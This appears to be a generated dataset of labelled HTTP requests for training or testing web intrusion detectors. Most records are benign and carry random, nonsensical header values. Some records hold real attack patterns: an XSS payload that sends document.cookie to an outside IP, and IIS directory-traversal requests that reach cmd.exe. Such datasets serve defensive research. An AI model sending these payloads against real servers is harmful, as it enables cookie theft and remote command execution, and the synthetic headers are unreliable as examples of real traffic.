If-Match: "xdJiD3xGfRr7DqL_chVL"
If-None-Match: *
If-Range: Thu, 02 Dec 04 13:24:16 CET
Max-Forwards: 2
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Basic Nml0aTZodzp4RG9jYWl0
Authorization: NTLM bGJlQVJ2ZWw4YzlldG9pR2lEZTUwc21udWx0ZW5zaHJv
Range: 970085-59,16356-937515,323-30
Referer: http://NaPetIsy.fr/da6islh.jsp
TE: deflate
Trailer: Cache-Control
User-Agent: Mozilla/1.4 (compatible; MSIE 2.9; Linux i386; seriae1; locusac0; caddhS4imd)
UA-CPU: MIPS
UA-Disp: 188,809,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 3131x3591
Via: FTP/2.0 28.166.166.116, dTt9/3.5 80.117.57.129
Transfer-Encoding: compress
Upgrade: 1ataa8/2.4, tfcco/9.9, ntpeI/3.5, Kng5/3.3, ii3/6.1
Warning: 856 71.214.87.68 "aesKobNh8beti" 
X-Forwarded-For: 248.81.152.247
X-Serial-Number: 13224
----: ---------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 23700
Start - Id: 22950
class: Valid
GET /tsXuY4bIosshsm/yrlzn/dWmailB/fH/Z.t@ffnbinvk/64le/jWZWU@.cgi?gna1ae=isylcr6yjsnull&fRmmolrw9aaoi6=44984&twpeS@N=s%25shmh9busrsEi9I&oitmallirdtre=sEpenHheehtltrq&nnouaat9iri=mailjwlyVsLptw&et=nph-yf HTTP/1.1
Host: 132.37.66.49:33408
Connection: close
Accept: */*;q=0.1
Accept-Charset: isiri-3342;q=0.1, cp-932, iso-8859-4, euc-jp;q=0.5, cp-950
Accept-Encoding: *;q=0.6
Accept-Language: Es-rTsaWHgd;q=0.9
Cache-Control: max-age=61011
Client-ip: 67.214.101.60
Cookie: t6gonbhNj=eBP-Jum
Cookie2: $Version="2"
Date: Wed, 23 Jun 04 15:32:58 CET
ETag: "ccKk8LrcO2k1cAc2Rtw"
Expect: lnlsts
From: wrmcT@heeEiet.org
If-Modified-Since: Fri, 02 Dec 05 24:18:02 GMT
If-Unmodified-Since: Thu, 24 Sep 09 05:58:16 UTC
If-Match: *
If-None-Match: "llTzpsWrMNQeBmuZ.q"
If-Range: *
Max-Forwards: 852
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: Digest username="snietTsh"
Authorization: NTLM c3hkbHlwdHNuaG9tcWllYTVsdGZlaG5odDdubDF0QWRyb2t1RTk=
Range: -294148
Referer: http://bazetsh.org/6hed/rgMg/ao0oe/0puq/hgtEt3a.conf
TE: trailers,chunked
Trailer: Pragma
User-Agent: Mozilla/6.5 (Machintosh; U; PPC 9.5; a4-ro; rv:5.5.8) Gecko/63467003
UA-CPU: 68000
UA-Disp: 164,400,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 159x1338
Via: 4stcm/0.9 75.243.201.129:94136
Transfer-Encoding: tiepet; 8bsvoa=rxss
Upgrade: rnr2u/8.9, NBtv8d/1.1, cmOm1/0.6
Warning: 349 167.176.37.95 "eumteoh1rgy6orin" 
X-Forwarded-For: 208.109.201.230
X-Serial-Number: 08954851223
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22950
Start - Id: 30193
class: Valid
GET /OP9YYY/so-KI1/4ffaibs4omttlhci/uywO/lfWKMwg6z/llpJDVegMp@k/a-QMw_z2Ie/7twQvarlX3qsRLmeta/uX4dCoyMcjO3dWLD.dll?6t=rJ0E5R&wH=msn0sFmeta%2Besoto+4c%2F&4hacaoaSn7ao=2n&on=s9GahIAu-%40y&-nGhomeQZ=r+lT%3Fbuoshutdown2ee%40eautoexec+zcesystem&tfitaioev0Hwed=x%27-ip&atyg=7876&troqth=748905053&hstxueopnfcH=4&keenurMi0GkhtEe=013&atU=%3Fe1r&oehsi45baHshl=keidsr HTTP/1.0
Host: 245.175.80.253:394
Connection: iSufotal
Accept: text/html, text/plain, text/*
Accept-Charset: isiri-3342;q=0.7, windows-1253, x-mac-chinesetrad;q=0.6, cp-936;q=0.0
Accept-Encoding: *;q=0.8
Accept-Language: H2fcpm-bhzt
Cache-Control: max-age=19950
Client-ip: 177.65.136.190
Cookie: AjL_=;esdiv;8eSknegameq=0
Cookie2: $Version="282"
Date: Thu, 06 Jul 06 04:45:17 UTC
ETag: W/"cxq2qJsQECsfzqrbt0"
Expect: gCiaud=uaseai;Iittoha
From: wieAim@aawfi.fr
If-Modified-Since: Thu, 19 Jan 06 08:29:05 UTC
If-Unmodified-Since: Tue, 30 Nov 04 06:26:42 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 08 Feb 09 17:03:43 CET
Max-Forwards: 0133
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: aGeo uhioari5=RFiho
Authorization: Digest uri=/lTer/tmdnizf.sh
Range: 8-
Referer: http://www.onxdten.net/rwe0pqN2/adOldt.php4
TE: gzip,gzip
Trailer: Authorization
User-Agent: r2Fit5sthmdtNuabate
UA-CPU: x86
UA-Disp: 058,5611,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 035x8386
Via: FTP/9.5 209.160.141.66, 5.0 www.eebJaNh.css, 0.1 26.95.41.196:4
Transfer-Encoding: compress
Upgrade: hosi/6.7, fne0e/8.7, zeue/7.8
Warning: 602 32.88.153.167:23729 "hrge" 
X-Forwarded-For: 46.52.217.2
X-Serial-Number: 19194011026
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30193
Start - Id: 46863
class: XSS
PUT /h3102T_PJd0yIgTS.png? HTTP/1.1
Content-Length: 422
Content-Language: g
Content-Encoding: deflate
Content-Location: /chcDi/voArir.gif
Content-MD5: b2lhMHBQZWNhaGF0NHl0aA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 27 Mar 04 16:45:32 UTC
Last-Modified: Sat, 20 May 06 12:06:28 UTC
Host: 173.176.206.104
Connection: keep-alive
Accept: text/*;q=0.0
Accept-Charset: x-mac-chinesetrad;q=0.4, iso-8859-5, iso-2022-kr, ks_c_5601-1987;q=0.2
Accept-Encoding: 
Accept-Language: aisraoul-Atotg;q=0.7, 3oe-tqiwgId, tshrlai-tesefs;q=0.3
Cache-Control: max-age=1
Client-ip: 152.154.47.47
Cookie: i8whe=9262271130;rhttqp8ekioiii=909946;ia3auhsEt=3tTs4 
Cookie2: $Version="96"
Date: Fri, 13 Feb 04 11:00:25 GMT
ETag: "ynNtDqxUiypefBzDU"
Expect: ascq
From: eisopAa@s6qldnnaej.be
If-Modified-Since: Mon, 13 Dec 04 22:31:05 UTC
If-Unmodified-Since: Wed, 19 Jul 06 09:52:22 GMT
If-Match: *
If-None-Match: "jv56Az3Sc3EQbJ0KKv"
If-Range: Mon, 13 Sep 04 08:24:42 CET
Max-Forwards: 7
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Basic amFib2lrQWY6bWVxOHNyZA==
Authorization: 30Mi x2Ljsisl=rnolxb
Range: 6262-,10870-70169
Referer: http://www.irLuwp.org/epuh5/hqZOHu/i6the/bimp3hat.wav
TE: deflate,gzip;q=0.3
Trailer: Referer
User-Agent: Mozilla/9.0 (Machintosh; U; PPC 5.5; Rr-44; rv:4.8.3) Gecko/16475732
UA-CPU: x86
UA-Disp: 457,6373,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 2245x173
Via: 2.9 www.tn6tm.css:26767, wlea/9.5 21.7.6.182, gnnh/8.8 www.flrk.shtml:240
Transfer-Encoding: gzip
Upgrade: enf/4.8, aeoeoi/9.1, d2aRmj/2.6
Warning: 910 www.aqeeeiu.htm "tjdShea8TwiOuAu" "Mon, 12 May 08 02:53:43 CET"
X-Forwarded-For: 213.211.107.254
X-Serial-Number: 93268691782079750245
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eIo=ytD'<o img &rexSijeeuIs=trhavingandnenonn0d&eylprhTs9dsywn=o2nt&oztec=smcatr&n9gqF=t83&kB5.bZTDAGQP=Foe&k78eh7iu=<style    type=    "     text/javascript   "    >[window.open('http://205.109.205.40/tela.jsp'+document.cookie);]</style  >&oolhtbedcic=317236658&aN3icrnzptea=334&Nnro4ieatoba3d=0264&pLiaoo1ipf=ea3 tei&rgsrafr=19&itueecpc25dr=yih &oq=9&rrmnrtrecoT5s=1akSOWU-9

End - Id: 46863
Start - Id: 36547
class: OsCommanding
GET /msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 175.224.102.45
Connection: close
Accept: application/*;q=0.7
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: nma-RiCiinw, eo-av6r, n7mpegl-mee;q=0.3
Cache-Control: max-age=16230
Client-ip: 131.100.188.215
Cookie: msaOetun=r2N;l9NBTq=$anm
Cookie2: $Version="7"
Date: Mon, 08 Aug 05 24:35:22 GMT
ETag: "qAEfzWG5X7Zdf0i"
Expect: 100-continue
From: h8IMoanr@hlhircha.ch
If-Modified-Since: Tue, 13 Apr 10 10:59:01 UTC
If-Unmodified-Since: Thu, 28 Oct 04 19:01:31 GMT
If-Match: *
If-None-Match: "mjNwGbHAxe-3M0DGNWp3"
If-Range: "CAXSyzgpnM7i0TN.51g"
Max-Forwards: 51
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Digest nc=Ad95328B
Authorization: Digest nc=7122aEA0
Range: -7292
Referer: /atth/yeoT.php3
TE: trailers,trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/6.3 (compatible; MSIE 9.3; Solaris; 6aucgyc; ltoecHm; dhmpc72)
UA-CPU: x86
UA-Disp: 1693,583,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 547x5195
Via: hdnv/4.0 165.212.249.40:0
Transfer-Encoding: identity
Upgrade: ildtt/8.0
Warning: 091 www.ihosnnr.htm "pcnttofmn" "Fri, 10 Jun 05 17:10:45 GMT"
X-Forwarded-For: 103.73.131.132
X-Serial-Number: 55534835625911216707
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36547
Start - Id: 12358
class: Valid
GET /0GCdb/gh3yv7/krei/SR/bJaDkeS4og9w/sRUmmQfzwhy1rfyr@9a/az1T8nsR0sMmAgm3cQS/Vcmdt@/eiqegts/oIeiuJu6vxdsci.jpeg? HTTP/1.0
Host: www.iiOoS.it:80
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: te='63san'
Client-ip: 47.20.218.229
Cookie: I@2bK=tah;lzLRN2og=15509515
Cookie2: $Version="47"
Date: Fri, 02 Feb 07 08:42:05 UTC
ETag: "l-O7e@MY85ZM4dft"
Expect: 100-continue
From: huuAfxy@eyooxthv.fr
If-Modified-Since: Thu, 25 May 06 23:00:51 GMT
If-Unmodified-Since: Thu, 16 Mar 06 03:13:35 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 20 Dec 09 04:21:03 GMT
Max-Forwards: 002
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: NTLM c2FCOXNTaXRydUJvWHRlY3poZEQybmF0c3lkdGNlNGNkdG9qZWJEV3luZWxiaXR2
Authorization: Digest opaque="hwp8om9"
Range: 662-4,8147-,483669-546
Referer: /eimf/00awrts/rei4/ptrBml/GmtTtt.bin
TE: gzip
Trailer: User-Agent
User-Agent: Mozilla/9.7 (Windows; U; Windows NT 7.9; tn-nN; rv:4.6.4) Gecko/80051194
UA-CPU: MIPS
UA-Disp: 3711,172,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8258x863
Via: 7.3 122.237.66.114, 0.8 34.68.26.207:5298, 4.5 www.Nersnvtv.png
Transfer-Encoding: t1qhe
Upgrade: oE2te/7.8, Hstma/8.3, oi5ia/6.9, iXetpi/8.4
Warning: 258 141.130.237.37 "ioreaseroE" "Tue, 27 Sep 05 18:21:28 UTC"
X-Forwarded-For: 202.158.102.83
X-Serial-Number: 250138591797251529
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12358
Start - Id: 32643
class: Valid
PUT /rruh/.1wwW/tLooeicofLnyAln2ce/8scs/ycgUxAa/dlesraeNskdhf/en/nutenln.jpeg? HTTP/1.0
Content-Length: 222
Content-Language: posee
Content-Encoding: deflate
Content-Location: /eeyu/6Unot2a/otol2el.tar
Content-MD5: ZHlubWhybjdvYWxwdHVlbg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 01 Sep 09 04:12:26 UTC
Last-Modified: Tue, 24 Jan 06 12:08:58 CET
Host: 63.193.131.218
Connection: r3egda3l
Accept: image/*;q=0.7
Accept-Charset: x-mac-roman;q=0.3, cp-950, windows-1253, iso-8859-1;q=0.7
Accept-Encoding: gzip;q=0.2, gzip, deflate, gzip;q=0.6, identity
Accept-Language: *;q=0.9
Cache-Control: min-fresh=041
Client-ip: 27.225.252.118
Cookie: I.VDI1rmq@2Wu=83828;EmdeojsRa29=7;eAae8efisi8r=tPXu6jN;0O=r7wn3ne;;osainaTrs5elalw=3365
Cookie2: $Version="7"
Date: Fri, 13 Oct 06 17:15:53 GMT
ETag: W/"wli1zBqdenWTFmK"
Expect: o2e6oYIs=ohjah;Geiwj=lhih
From: Ieaod@xebeE.uk
If-Modified-Since: Tue, 02 Sep 08 03:55:44 UTC
If-Unmodified-Since: Fri, 24 Sep 04 07:03:05 CET
If-Match: *
If-None-Match: "M7Gj8DToYDfHGfrJP_"
If-Range: Sat, 27 Aug 05 15:20:28 UTC
Max-Forwards: 76
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: 0o5ihf yo2hT=8isrh
Authorization: nano 1dpe=eicEe
Range: -8365,-00217
Referer: /bhxo.bin
TE: deflate
Trailer: Cache-Control
User-Agent: bo6onemeos2eateqdy
UA-CPU: PowerPC
UA-Disp: 530,9577,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 853x924
Via: h1aDpt/1.2 218.174.3.18, 9.0 178.89.97.96:54063
Transfer-Encoding: deflate
Upgrade: ynt1h/8.2, ngs7ii/4.5, emia/0.6, hboy/6.2
Warning: 166 182.140.231.49 "qo7ntkcIsaeidh7" "Thu, 17 Feb 05 17:04:23 CET"
X-Forwarded-For: 1.120.217.6
X-Serial-Number: 14198779071
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

yS=rLE&xnBeaoud=drBdpyaEa9&M9kP1.=httpsrtiframesn|mtevvbscriptl&wL=fpT&eelof=cya0&eZieehlUcral=medaeortfwniit%&tG=4724208&tghat=t&owl=qzdropeB0p6ima$&mYtexk2n6nl=28953573&eih=219&vMPc0y=s&2gscripte=clOOnaerAomu0Wk2r9

End - Id: 32643
Start - Id: 14461
class: Valid
GET /ilrorZ46GSdgD2TT/fsws.UjhsytLF/eEJNX/ld/oahseldonstc8a3ihY/btpH9f0IMmYWpa4Pw.kl/iqsZr1-wpPcdse/lesrutegsdan/DLrdooFnmqswlpsitfY/ytd0es.php?rpcLiimgJmailX-=af&5roTaNrzdn3=%25neohR%7E+tts6lr-&t8=71&W8Ac3gDpPrTL=lM3z7h2Z&ruooceii=ourataatbnjietl&ti=ssetnlut&oedcs8v=ivc8 HTTP/1.1
Host: www.fITs.de
Connection: ecnh
Accept: video/*, application/*;q=0.6
Accept-Charset: *
Accept-Encoding: gzip;q=0.4, compress;q=0.4, gzip;q=0.5, deflate, compress;q=0.6
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 34.163.123.98
Cookie: hs80fqthbrrnua=g6s;rain=7fV;Na5veeogntgaatn=eJNd9z;eltcisxslncbeea=8129533661;xaT=elihhAejcoo;caoFobnOao1l2=a;eval ifs
Cookie2: $Version="0"
Date: Sat, 19 Feb 05 10:45:57 GMT
ETag: W/"jDK252a@c3hzQddGNCD"
Expect: 100-continue
From: inuozal@th8rsa.cz
If-Modified-Since: Fri, 06 Jan 06 20:36:27 CET
If-Unmodified-Since: Mon, 10 Dec 07 05:34:21 GMT
If-Match: "o532Mggw@.9NNDkDA"
If-None-Match: "u_Pg0Fsg.9fAiRC"
If-Range: Fri, 12 May 06 04:12:47 CET
Max-Forwards: 3
MIME-Version: 2.3
Pragma: gnnet='yro'
Proxy-Authorization: Basic b0x1ZmF3OmVvcmFhdEFO
Authorization: Digest realm
Range: 063-,416644-557318
Referer: /egirub/tIEiu.gz
TE: gzip;q=0.9,deflate;q=0.7
Trailer: From
User-Agent: nasaasuai5oeei9dimv
UA-CPU: 68000
UA-Disp: 6368,730,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 5927x518
Via: 9.5 237.249.34.58:13, 0.0 www.tby3m.shtml
Transfer-Encoding: gzip
Upgrade: trkh/8.6, taslsi/0.6, se2/8.7, etaY/5.5, dpsae/7.4
Warning: 847 183.112.194.21 "jRtnvs4nlix" 
X-Forwarded-For: 57.244.86.38
X-Serial-Number: 309851
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14461
Start - Id: 44530
class: OsCommanding
GET /data/..��../..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 149.43.169.231
Connection: tnsf4np
Accept: image/*;q=0.1
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Cookie: atswae=enhisto'Tnth;ISlhjhpyrale8=jewSsobject8~e9
Date: Mon, 13 Apr 09 22:53:57 GMT
ETag: W/"pik_981fbQAX0z-QQeD"
Expect: swso=vdlpOs
If-Match: *
If-None-Match: "ZBaC@EA2nBCb@.gpc5s_"
If-Range: *
Max-Forwards: 977
Pragma: no-cache
Authorization: Digest response="208F600d95D2dDe4DB8BB5BaA6EEC86a"
Range: 30684-
Referer: /q2EceeMn.pl
TE: trailers
Trailer: TE
User-Agent: Mozilla/6.3 (X11; U; Solaris 1.3; Iu-se; rv:1.6.4) Gecko/69924816
UA-CPU: 68000
UA-Disp: 681,3359,16
Via: cbs/9.9 www.teTeu.gif, HTTP/8.9 www.piert.html:0
Transfer-Encoding: compress

null

End - Id: 44530
Start - Id: 9384
class: Valid
GET /Z5dDiU56varMautoexecZDPD/stdin1KH3Y1jEb_DyM/WM29L_kMhS/d@Evm/sB5b3TO2-WESgG/ejcxtXi46/eEjNGu3tu8l@uUEop2.K/M-tXwBQhtpassXME/a2eal/m@kG/eLHEMPfNDasREpalGkI/rrgneedtRteV4plveth.gif?rtxx9reuead=52650340&Ba0yaa=dtd&r9etI=23107&9m=08814&hitLk7p=xant&ehM=aelbin&euiwdihezuo=l4Kcj8OB0P&G-eYbDG=by7u&RQi1eeatvri=o0%40QSqf4Fyp&fnN=lqhu+mi+&ntGso=054963365 HTTP/1.1
Host: 240.85.197.71
Connection: keep-alive
Accept: image/jpeg
Accept-Charset: iso-8859-8
Accept-Encoding: 
Accept-Language: eOdE7Et-rod
Cache-Control: oawty8e=ixa
Client-ip: 120.165.116.131
Cookie: tSDe7ge9e=auxiEvy824Q4
Cookie2: $Version="57"
Date: Mon, 04 Sep 06 16:46:58 GMT
ETag: W/"bz7T637sVilnuIcqZ"
Expect: cont
From: Rph6gn@nnrikt.be
If-Modified-Since: Sat, 31 Jan 09 19:46:26 CET
If-Unmodified-Since: Sun, 12 Dec 04 13:35:55 GMT
If-Match: "-ozJ9seTEYqrA0gVRw"
If-None-Match: "RH6Te3IkC5Cnpqk"
If-Range: *
Max-Forwards: 7
MIME-Version: 5.6
Pragma: mhha='ei8sO'
Proxy-Authorization: OdcSix ayHxs=easseTwo
Authorization: NTLM enJlZWNlRWR5VWU1cjVUdHNmcnRsdXVpYTJ0RTFka2FOcg==
Range: -38842,-94429
Referer: http://fea7t.it/atco/9arir0.jsp
TE: deflate;q=0.5,gzip
Trailer: Accept-Encoding
User-Agent: Mozilla/7.7 (Windows; U; Win 9x 0.8; 6e-0s; rv:8.7.6) Gecko/03838191
UA-CPU: Sparc
UA-Disp: 147,1254,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 9764x9599
Via: otHeda/6.8 www.9joiebEl.js
Transfer-Encoding: gzip
Upgrade: n1s/5.5, lmwiso/3.8, Tal9/6.5, E6Ia/4.3
Warning: 782 1.21.166.132 "ddoam8pa2ee" "Mon, 28 Jun 04 14:04:38 UTC"
X-Forwarded-For: 89.84.41.1
X-Serial-Number: 77473123
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9384
Start - Id: 546
class: Valid
GET /cLi@H6/o9w2csk/2gRO/qNLhQe/ncoaaahyotemano.dll? HTTP/1.0
Host: 241.192.76.186
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, identity, compress, identity;q=0.0
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 251.178.170.205
Cookie: 8e-.betweenD=i.tJEAd
Cookie2: $Version="06"
Date: Thu, 05 May 05 12:37:04 UTC
ETag: "Faz-tbZnIlNhkXk"
Expect: 100-continue
From: aw3y@tagxoisrl.de
If-Modified-Since: Fri, 22 Aug 08 15:56:25 GMT
If-Unmodified-Since: Mon, 27 Apr 09 10:21:50 GMT
If-Match: *
If-None-Match: *
If-Range: "bDg-1oDMgeIVPEQP6d"
Max-Forwards: 6711
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Basic N2dtVGFzOjh4cnRw
Authorization: moQfnt kieuxhid=unbtiB9
Range: 6338-978,18895-
Referer: http://eeeEiIza.fr/fpfti/eocafn/ila4he/fatjtIeu/Gmcst2v.rar
TE: trailers,deflate
Trailer: Accept-Charset
User-Agent: t.NN1oUf http://www.eWyfRZyr.it
UA-CPU: StrongARM
UA-Disp: 7032,830,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 407x2833
Via: 4.8 www.tecnos.gif, HTTP/9.7 www.r6ota.jpg:4435, FTP/5.0 www.eezI98.css
Transfer-Encoding: Ttgdt; 4gs0Ootv=eozdiEi
Upgrade: tth/7.2, dia/5.2, 17ohEa/5.1, dn2/4.0, lsaabo/1.1
Warning: 407 61.177.126.131 "vnalqAb" "Sun, 08 Jun 08 09:27:56 GMT"
X-Forwarded-For: 248.12.237.242
X-Serial-Number: 87479375442
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 546
Start - Id: 25013
class: Valid
GET /dcs0ln3H/lhoieEsaNTsdtcictltO/wlV-YuEQG5SgZ3Aa6/8fromlNyc@7CHX-_xu/rRkoQxbRK.Wc/oniherilhruneaAu/oXNxTZ6Wqr5eq/8Taneuehieopocp/nOBTafT/ykeX/zDzNoZB/ronMSmiDl5gU6N.Jnm..php4?eip5Te=hn6h&eta=662&itst=l%2F%7C+nc%3E%29h0dfxiri6d&jcaskxaenqxhtby=9t%5D%26e+E%26%7E&ekcoYeest1Dh=rpasswdreewlAa+opttnu3re&rteoaIid=aydBB&w1mtthn=5olaeisdrnhE&mWsS=sr&toialstlte=a+i HTTP/1.1
Host: www.8kfddfoliO.gov
Connection: ehtc
Accept: video/quicktime
Accept-Charset: hz-gb-2312, iso-8859-3
Accept-Encoding: *
Accept-Language: a-yG;q=0.7
Cache-Control: no-transform
Client-ip: 99.69.163.62
Cookie: WsyAFFnW=169;onicewa5o=xnh=gh;Tisroomnat7A=9301539
Cookie2: $Version="2"
Date: Wed, 29 Dec 04 05:05:07 GMT
ETag: W/"0Hvg@u8X5QAlknvgh7rb"
Expect: wnenobd=9tseS;0scLco=Oedtaad
From: nzwrNfc3@izathr7huy.uk
If-Modified-Since: Sat, 06 Oct 07 10:17:04 UTC
If-Unmodified-Since: Tue, 06 Dec 05 02:24:48 UTC
If-Match: *
If-None-Match: "rYcJd8fCW2fMKthS"
If-Range: Wed, 22 Nov 06 07:11:15 UTC
Max-Forwards: 22
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: Digest opaque="lezief"
Authorization: Digest nc=C40B2b79
Range: 46-,280-2255,32588-
Referer: /rrteet/eaCtod/qoaeq/aotr0iff/gmeRto9.css
TE: trailers
Trailer: If-Match
User-Agent: eoqIo/6.1.1.0.9
UA-CPU: MIPS
UA-Disp: 0119,2506,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 669x906
Via: 2.9 www.atl6h1c.jpg
Transfer-Encoding: deflate
Upgrade: qrr/1.4, tcee/4.7, etrlFl/9.5, ehb/4.8
Warning: 922 25.148.114.39:28474 "fmaasanertcaeR" 
X-Forwarded-For: 190.232.63.32
X-Serial-Number: 92423943597
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25013
Start - Id: 17523
class: Valid
GET /e2bwBLCrir3tr7p/zS1Mupdate.htm?y2bsouteee=59 HTTP/1.0
Host: www.hhtqkrs0s.ch
Connection: close
Accept: */*
Accept-Charset: windows-1258, iso-8859-3;q=0.5
Accept-Encoding: compress
Accept-Language: hbwcoreB-nO, s-ke5n;q=0.6, oizPb-sIo, nwsteeS-Se, E-qglP;q=0.1
Cache-Control: no-store
Client-ip: 171.109.4.169
Cookie: rherhsh=04;H8ULW=iavGneoswhohe;yieitssplawyih=hhgnh;eialnfesri=52;2l9seteojt4e=tApr
Cookie2: $Version="11"
Date: Sat, 13 Mar 04 17:59:39 GMT
ETag: W/"3-@NsXhqdePj1@D@Dq0A"
Expect: 100-continue
From: pltrgcr@hrswfw.com
If-Modified-Since: Wed, 09 Dec 09 16:46:57 CET
If-Unmodified-Since: Sun, 12 Aug 07 24:21:01 UTC
If-Match: "jXmRXZ-zuAS-CJbwFZz6"
If-None-Match: "GEq8CUsxKXvR6@FB9"
If-Range: Sun, 28 Aug 05 04:42:51 CET
Max-Forwards: 42
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: Basic YTFubDpleTFzbnVl
Authorization: NTLM ZGFlZWFzZWE0bGc5ZGx0ZHJ0ZW9zc25uc3RzaTB4ZHNvOUFsZXU=
Range: 8940-,0923-,5121-
Referer: /Chin/yexdo/Eshso/zm2iodte/tszr2skn.css
TE: trailers,trailers,chunked;q=0.3
Trailer: If-Unmodified-Since
User-Agent: Mozilla/6.8 (Windows; U; Win98 8.8; xl-a3; rv:5.1.5) Gecko/21312834
UA-CPU: StrongARM
UA-Disp: 3556,2062,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 6595x691
Via: 6.4 89.235.129.66, 1.8 www.c6tLwi.shtml, 8.7 5.126.234.40
Transfer-Encoding: dei65i; lw0seo=doae
Upgrade: SeErb/6.9, tergey/9.8, tRtb/8.4, ytit6/9.8, s8ae/9.8
Warning: 256 www.hcAgiw.jpg "izNdebthOurploq" 
X-Forwarded-For: 249.253.15.15
X-Serial-Number: 2759427
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17523
Start - Id: 8519
class: Valid
GET /hEyZXe08bd/nwj0VavmD1@.shtml?ClU6inj=%24nbetween&qsnssaayeMcai=bhawnUi&htre3if8s=%5Ba%5Dn&Dr@61.-vsj=up.xW5YGu&nTKiboincludePBunion1O=rf&6Ast=n%40npd%25urzdwh&rw=evttm%27%5Ce&hy9Et=q9vcOtnoiimhqOr6&QFC7MMRgconnectoRdocument=ntldseAednwiHAli&tt=772&I1sileo=Hynbte6fy HTTP/1.0
Host: 101.25.246.211
Connection: close
Accept: */*;q=0.4
Accept-Charset: iso-8859-2;q=0.9, iso-8859-2;q=0.0, x-mac-chinesesimp;q=0.1, cp-932;q=0.3, windows-1254;q=0.6
Accept-Encoding: *
Accept-Language: u-aob2qn;q=0.0, e68-a, otlE-nodw, fv-amt, sA-ismk34th;q=0.7
Cache-Control: no-cache
Client-ip: 116.12.20.60
Cookie: rwtlw=E0ce)uomeh winntrdc;-UB-S21=:i;BA_4mochak=a c;RENM28phpGZ20d=aH1ftdQlehGZ;tana2te7y=aetTpdesfrk;tsa4dszeid=o\
Cookie2: $Version="3"
Date: Mon, 07 Feb 05 21:30:08 UTC
ETag: "VYwYeqQX2hURZNlJJfS3"
Expect: slYre
From: esnowat@SliNzma.gov
If-Modified-Since: Thu, 29 Jun 06 13:29:04 GMT
If-Unmodified-Since: Sun, 23 Apr 06 16:16:44 UTC
If-Match: "qCTfsXcIa7NCl2."
If-None-Match: *
If-Range: "pTl4E-wTEVK7raRYTKYS"
Max-Forwards: 4
MIME-Version: 7.7
Pragma: lrBvet='anLlar'
Proxy-Authorization: Basic bnQ0ZTp0TGV0
Authorization: Basic aGhodDpvZWl1
Range: 288-033,80242-026
Referer: /0aDeel/oyaE/iaz3e5ia/saap/6lln.dll
TE: trailers,deflate,chunked;q=0.3
Trailer: Accept
User-Agent: Mozilla/2.8 (compatible; Konqueror/5.8; SunOS sun4u; ttrs; ivq9; clehtckw)
UA-CPU: 68000
UA-Disp: 7723,577,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 108x957
Via: 0.3 62.31.222.125, FTP/8.0 www.1eGra.css:625
Transfer-Encoding: gzip
Upgrade: ctieoL/1.3, oars/8.2
Warning: 328 182.117.115.208 "nRgge7dorgtiielaAlw" "Sat, 18 Aug 07 10:39:09 GMT"
X-Forwarded-For: 249.204.156.98
X-Serial-Number: 116122935
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8519
Start - Id: 11249
class: Valid
